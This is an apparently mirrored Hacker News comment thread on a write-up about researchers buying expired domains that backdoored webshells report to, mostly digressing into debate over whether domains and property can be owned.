Hacker Remix

Backdooring Your Backdoors – Another $20 Domain, More Governments

431 points by mooreds 1 week ago | 73 comments

Lammy 1 week ago

To avoid my comment being entirely a terminology nitpick I will say this is very cool work that I would be too afraid of CFAA to ever attempt. Especially funny to see four parasites on one government domain. Do skiddies not excise other skiddies' backdoors when pwning systems so they can have them all to themselves?

> We then hooked that up to the AWS Route53 API, and just bought them en-masse. Honestly, it’s $20, and we’ve done worse with more.

> We’re incredibly grateful for the support of The Shadowserver Foundation, who have agreed yet again to save us from our own adventures and to take ownership of the domains implicated in this research and sinkhole them.

I wish we could collectively stop using the terms “buy” and “own” with regard to domains. Try “leased” or “rented”. If they could be bought then they wouldn't have been available again for this exercise.

judge2020 7 days ago

What would buying even mean in this sense? Even countries don't "own" their ccTLDs, but ICANN has made considerable efforts to outline policies that go "we really need to treat ccTLDs like the countries own them to avoid tensions over internet namespaces". That's why most gTLD rules don't apply to ccTLDs.

Countries "own" their ccTLD in the sense that they (or most) have the military prowess to defend their usage of their ccTLD if ICANN, or the servers at root-servers.net, were to stop resolving TLDs appropriately.

NewJazz 6 days ago

The root servers hold the real power, and IIRC over 50% are operated in the US, with many of them being operated by the US military and others educational institutions.

I can only assume that the US has tolerated varied use of ccTLDs for the sole purpose of avoiding a competing alternate DNS root zone becoming more prominent.

preciousoo 6 days ago

I’m sure the NSA does their best to make sure the US doesn’t politically fuck that up

croemer 6 days ago

But root servers aren't a democracy, are they? If US root servers went bonkers, people would just use different root servers. Doesn't matter whether it's 50% or 90% that are in US if they can be ignored?

NewJazz 6 days ago

Yeah that's the point. If US acted up, and pressured other operators to follow suit, the root zone could split up. They don't want that to happen.

BobbyTables2 7 days ago

DNS is then a weapon of mass destruction

awwaiid 7 days ago

All property, physical and digital, is rented if you squint just right.

noduerme 7 days ago

I'm curious if this is a socialist lament about landlords or a libertarian complaint about governments.

lazyasciiart 7 days ago

Maybe it's an existential comment about the fleeting existence of life.

noduerme 2 days ago

That was actually the first way I squinted at it, and it doesn't have to be existential - the lack of ownership in the fourth dimension is stated well in most religions. But for some reason I doubt they meant it that way.

nightpool 6 days ago

I think it's just acknowledging the reality that property is a social construct, one that's created by the social contract.

mathieuh 6 days ago

Well, Rousseau himself would say property is theft in not exactly those words

From his discourse on inequality

> The first man who, having enclosed a piece of land, thought of saying "this is mine" and found people simple enough to believe him, was the true founder of civil society. How many crimes, wars, murders; how much misery and horror the human race would have been spared if someone had pulled up the stakes and filled in the ditch and cried out to his fellow men: "beware of listening to this imposter. You are lost if you forget that the fruits of the earth belong to everyone and that the earth itself belongs to no one!"

short_sells_poo 6 days ago

Ultimately it comes down to force. The person with the pointiest sticks will likely be able to enforce their view about ownership over others.

Taken quite literally, property is armed theft from the commons I guess. Unfortunately, it's tricky to do otherwise in a loosely organized swarm of barely tribal actors, because any peaceful society based on shared ownership will be prone to exploitation by malicious actors. It's basically a very large prisoner's dilemma: the global optimum would be to abolish private property, but as long as there are (enough) people around to exploit the situation for their own benefit (and to the massive detriment of everyone else), we have to stick to a sub-optimal system where everyone is worse off than the optimum.

noduerme 2 days ago

How would the global optimum be to abolish private property when you just stated that without it we live in a swarm of barely tribal actors?

The alternative to large-scale force is small-scale theft. Which is not so small-scale when you multiply it across every village and province. Ever been in the middle of a full social breakdown? Or a riot? Anyone who's seen what actual anarchy looks like would beg for some sort of order, even if it has to be imposed by force. It requires a very sheltered understanding of how the world actually works to think that anything good will come from unleashing chaos.

nightpool 6 days ago

> Ultimately it comes down to force. The person with the pointiest sticks will likely be able to enforce their view about ownership over others.

This is a common but simplistic view that ignored e.g. concerns about popular legitimacy and support that often lead to the downfall of strongman regimes. Many people think they can enforce their views of ownership over others, but find that it's not quite that simple when they try to put it into practice. That's why I mentioned the social contract.

robertlagrant 6 days ago

> the global optimum would be to abolish private property

The Soviet Union had this I believe, at least with buildings, and it didn't necessarily work out optimally.

short_sells_poo 6 days ago

Certainly, and to be clear I'm not arguing for communism as a realistic system. It would be ideal in an ideal world without greed and selfishness. As long as those exist, we need to have a system that functions when the individual actors place their own interests far above the interests of others.

foobarbecue 6 days ago

I like to think of it biomimetically. Organisms and ecosystems have both competition and collaboration at every level of organization.

If I were to design a government from scratch I think it would actually be relatively easy to know what's best nationalized and what's best privatized. Nationalize the things that you do not want to be driven by the profit incentive because they need to be fair and accessible to all (mass transit, healthcare, utilities, communication networks, science), and privatize everything else (entertainment, retail, food, services).

throw5673985 6 days ago

> privatize everything else [including] food

yet:

> Nationalize the things that [...] need to be fair and accessible to all

Should food be accessible to all?

Or is food production privatized because market economies more accurately meet consumer demand?

short_sells_poo 6 days ago

Food is tricky. The food supply is one of the highest national security concerns IMO. Free market proponents love to go about saying that growing food should be left to countries and regions who do it well (due to climate and infrastructure), but if your country cannot grow enough food to supply it's own citizens' basic calorie needs, you are literally living on borrowed time. If the food supply is cut off for any reason, things go down very-very rapidly and the government has days, if not hours to sort things out before things descend into chaos.

At the same time, governments do not have a good track record of running the food/ags industry. I guess a system where the government heavily subsidizes it and incentivises domestic production, but lets farmers do their thing is probably as good as we can do?

foobarbecue 1 day ago

Good point. I learned this from Silo!

I say the government needs to ensure no one starves (food stamps, soup kitchens, etc. depending on the situation), and all food is safe to eat (it amazes me how well governments do this in most countries today), but otherwise production and distribution should be competitive.

noduerme 2 days ago

Countries that allow markets to control food prices have a far better track record of not starving, spiraling into hyperinflation, and losing wars than do countries which attempt to regulate food prices.

robertlagrant 6 days ago

> Free market proponents love to go about saying that growing food should be left to countries and regions who do it well (due to climate and infrastructure),

I think this is globalism rather than free market.

noduerme 2 days ago

I agreed with your first statement about competition and collaboration both being necessary. But if you extend that over time you see that those states in nature exist in a state of endless conflict, not in parallel. So in the realm of governing economies (democratically or otherwise), one of the most unfortunate but profitable outcomes of the human desire to oscillate between competition and collaboration is to be something like Argentina: Nationalize those things you want to be fair and accessible every 10 years and then privatize them again every other 10 years. This way, each new generation can lean capitalist or communist and make a killing by raiding whatever wealth was built by the previous generation in the name of fixing the system. Because after all, neither system is real. Both are just ways to paper over the fact that each new generation of young people are animals who kill their parents.

foobarbecue 1 day ago

8-0

foobarbecue 6 days ago

Wow, he sure can write! Proudhon literally wrote "property is theft" (see my other comments).

mathieuh 6 days ago

I'm aware, I was quoting Rousseau because the person I was replying to mentioned the social contract which was an area of particular concern for Rousseau. I would recommend reading Rousseau's Discourse on Inequality if you're interested, it's very accessible.

foobarbecue 6 days ago

Thanks, I will!

SkyBelow 6 days ago

Maybe a deeper truth that is harder to put into words but which feeds into both of them. Something captured in much higher dimensional concept space that, when forced into our 3D world (and our <whatever>D political discussion space), looks like a sphere in one projection and a cube in the other, but which is neither.

short_sells_poo 6 days ago

I tend to think is neither of those, but meant very literally. For that reason I like it and I think it's an interesting subject.

What is ownership after all? The universe does not seem to have any form of ownership embedded in it's fundamental laws. If ownership is a human construct, then it is only meaningful insofar as a group of humans agrees on it.

I can stroll up to the White House and declare that I own it, but I'll struggle to convince a sufficient number of other people that this is true. If I can't assert my ownership, then I don't really own it, do I? It doesn't matter whether it is just, or fair (again - purely human constructs), ownership only matters if it can be enforced.

Being a human construct, it is also by definition temporary. It is only valid as long as humans are around to enforce it, and humans are fleeting. Humanity might endure, but there's no reason to think we are going to be around for eternity.

So it looks like ownership is not only temporary, but it is also fickle. People routinely disagree on ownership and are willing to kill- or be-killed for asserting their claims.

It looks like neither the communists, nor the liberatarians are in the right. Things will be owned by whoever has more pointy sticks :D

noduerme 2 days ago

It's not a human construct. If you have ever spent time around a cat, you can understand ownership completely without any legal constructs. What we as humans are somewhat proud of, or the definition of civilization, is that we spend most of our time trying to create systems to define boundaries and property rights without resorting to violence. Those systems can be fair and well-distributed or unfair and hereditary, or somewhere in-between; they inevitably hand over the violence to some arbiter or government (whether market-driven or communist dictatorship, it's the same in terms of a structure enforcing who gets what, even if the incentives and dynamics are skewed); but the point is that we code them into law so that any arbitrary cat can't just post up inside another cat's borders and terrorize the house.

The point of PROPERTY writ large isn't the piracy or acts of violence that people here make it out to be. Property doesn't arise from the law. Legal frameworks arise from the existence of property. And legal frameworks are an unadorned good in a world without them, because normal, domestic, and peaceful life does not exist where laws don't exist.

robertlagrant 6 days ago

> Things will be owned by whoever has more pointy sticks :D

That sounds like the feudal or socialist systems. Isn't one of the points of modern democracies that we have the pointy sticks for outside invaders, and a legal system that replaces the system of internal-facing pointy sticks with an economic system and a justice system?

krapp 6 days ago

No. All systems of law, regardless of their "democratic" nature, are based on the principle of the state's monopoly on violence, and that violence is always directed towards the citizenry.

No matter how civil your society may seem, resistance to the state will eventually mean you get shot or beaten with truncheons.

short_sells_poo 6 days ago

Exactly. Democratic and highly civilized countries still enforce property rights with pointy sticks. They maintain their claim on their territory against outside invaders with the army, and internally they enforce the laws of ownership using the police.

bell-cot 6 days ago

> I wish we could collectively stop...

That's a "feature" of human nature and English. People say "my car" and "my phone number" when those are leased. "My house" when they have a new zero-down mortgage. And all sorts of other conceptual contractions - with the messier reality assumed to be common knowledge. Or just irrelevant to the point at hand.

TacticalCoder 7 days ago

[dead]

fn-mote 7 days ago

I loved this write up. Light-hearted. Conscious of the impact of any disclosure. Everything substantiated, but not taking themselves too seriously. Enjoying read, and at the same time talking about a serious issue.

ipdashc 7 days ago

Thank you for putting it in words. I felt the same way, both about this and the writeup for their previous .mobi thing. Well explained with plenty of context, no buzzwords, light hearted and cool (while not trying too hard to make themselves sound cool), and plenty of substance with no fluff. A lot of blog posts or security write-ups violate some of these; this is a breath of fresh air.

taspeotis 7 days ago

I also loved the appearance of WordArt, shame they did not do the rainbow one.

Thorrez 7 days ago

I wonder what would happen if they exploited these webshells' backdoors to delete the webshells...

abound 7 days ago

If you're the FBI (and maybe also have a court order), you can do this [1]. If you're a grey hat hacker in Russia, you can maybe do this [2]. If you're a random person in the US, you're likely exposing yourself to a lot of (CFAA) risk.

As the authors of this post note, they were careful to only receive + log traffic and not otherwise send interesting responses/engage with the webshells.

[1] https://www.malwarebytes.com/blog/news/2024/02/fbi-removes-m...

[2] https://www.zdnet.com/article/a-mysterious-grey-hat-is-patch...

croemer 6 days ago

I'm not sure I understand this correctly:

> This is a line of CSS, specifying that the ‘menu’ style should fetch a background image from the given URL. On loading the page, the web browser will attempt to fetch the specified .gif file from the w2img.com server.

> Note: Disclosing just the domain in referrers is a relatively recent browser change, and indeed attackers using older browsers were sending us full shell URLs.

In particular re "attackers using older browsers": haven't the (original) attackers taken over the _server_ that's serving the CSS and the browser belongs to unsuspecting _users_ of the pwned server? Isn't it wrong to say the attackers use the browsers then, as the browser is used by a victim?

Under which circumstances would _attackers_ be using a browser? I can't make sense of this.

TazeTSchnitzel 6 days ago

A webshell is a page (typically a .php file) uploaded to a site by an attacker after a compromise (e.g. an RCE), which is then used by an attacker through their browser to perform further actions on the compromised webserver. These premade webshell files however have been made by other attackers and come pre-compromised with a backdoor. In this case the CSS in the webshell makes the attacker's browser snitch the webshell's location to a domain controlled by the author of the webshell.

croemer 6 days ago

Thanks that makes sense, not sure how I could miss that.